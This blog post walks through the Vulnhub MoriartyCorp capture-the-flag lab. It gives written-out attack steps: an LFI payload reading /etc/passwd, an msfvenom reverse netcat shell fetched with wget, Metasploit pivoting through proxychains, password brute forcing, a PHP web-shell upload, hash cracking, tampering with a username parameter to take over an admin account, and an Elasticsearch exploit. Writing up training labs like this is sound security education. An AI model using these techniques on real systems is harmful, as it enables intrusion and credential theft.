Vulnhub – MoriartyCorp Walkthrough

Scanning the host with nmap –A –T4 –p- 192.168.1.12 –vv

At first i visited the site at port 8000 and i got some kind of instructions and a box to enter flag{start} and the next page they said to visit the site on port 80 which wasn’t available at fist scan, and if you run nmap again port 80 is open now.

This is the site on port 8000

And this is the site on port 80

Ok now for some LFI i got a respond back by viewing “passwd” file by entering ?file=../../../etc/passwd

Now for the next step i recommend this tool LFISuite, as the host is vulnerable to LFI we are going to get a shell, download the tool and start it py writing python lfisuite.py and chose the #1 Exploiter, then #9 Auto-Hack, enter the web address http://192.168.1.12/?file=page1.html and you will get a shell:

Now according to the tool webpage if we want to get a reverse shell all we have to is type reverseshell and enter our IP and the listening port, but the problem is it’s not working as there is no python no php installed on the host.

What i did is made a script with msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.1.13 LPORT=4444 > shell.sh and transfer it to the host with wget and then used metasploit and i got a shell back.

Now to escape the shell jailed just type /bin/sh –i then navigate to / and you can see the first 1_flag.txt file:

We write the flag{the_game_is_on} back in the page 192.168.1.12:8000

And we got the next step to process from here.

Using arp –a gave us one IP address (172.17.0.1) at 02:42:e0:05:31:77 [ether]  on eth0

After a lot and a lot of googling i found this page which is great for Pivoting with Metasploit, following the steps will get us to access the intranet on the host (had to do the get back to meterpreter session again to do these steps):

First we need to edit /etc/proxychains.conf file and add socks5 and our ip and port 1080:

Then on metersploit we put the session to the background just by typing ‘background’ so we can use the proxy and socks5:

run autoroute -s 172.17.0.0/24

run autoroute –p

use auxiliary/server/socks5

run

Now in a new tab run this command proxychains nmap 172.17.0.0/24 -sV  -sT  -Pn  -T4 -p80 and you will get something like this:

Then i used a Firefox plugin to run a proxy ProxySwitchyOmega and added 127.0.0.1:1080

Now we have access to the intranet go to 172.17.0.3 (the first two ip’s is not the right ones):

We got an upload page with password required, let’s fire up BurpSuite and brute force the password, first turn off the proxy just to give BurpSuite a chance to catch the traffic then we can turn it back on later:

The one password that’s is different in length is ‘password’, BUT WAIT before we do anything let’s just upload a shell code to the server, a php shell code will do it just fine:

We got our listening port ready nc –lvp 333 and we got a shell back to our machine, this time we found the flag number 2:

Now we write the flag in the flag box and see what we got:

We got some usernames and a password hashes to crack, we going to crack them online as they are very easy:

MORIAS – password – guest – admin – toor – root – mcorp – moriarty – MCORP – weapons

And the right one is weapons and the username is root

Ok at this point i couldn’t use ssh from linux using the terminal or even using putty or snowflake-ssh or any other clients, i end up using MobaXterm on windows machine, i usually use it with Raspberry-Pi and it worked:

The next flag is flag{what_weapons}

Ok now we going to scan the host again but this time we got ports 443,8000,8080,8888 and a username: buyer13 and the password is arms13:

Ok so the secret webpage is hosted on IP 172.17.0.5:8000

Now fired up BurpSuite, we have a chat page and a change password page, the chat is going between two, the buyer and the admin, while the change password is for the buyer which we can manipulate:

We can change the username to admin and leave the password as it is, send this output to the repeater:

Now we got in as admin and we can see a new chat page:

The new flag is flag{on_the_move} let see what’s next:

OMG this lab is getting ridicules, it’s been two days now and a lot of bugs don’t know from where or what causing them, anyway it says it’s the last evidence, something about ElasticSearch i searched for it on searchslpoit and got some results:

Ok now ElasticSearch exploit must be running on port 9200 (you can know the port from Metasploit ) so i searched again with proxychains –sV –sT –Pn –p9200 172.17.0.0/24 and i got a result back on IP 172.17.0.6:

Let’s try the exploits one by one and see which one will work:

Ok it was the first exploit and it worked proxychains python 36337.py 172.17.0.6:

The last flag is flag{game_over} let’s use it for the last time:

WHAT!!! I got blacklisted lol, oh well it’s finally done, it was an amazing box and took me two days to solve it.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s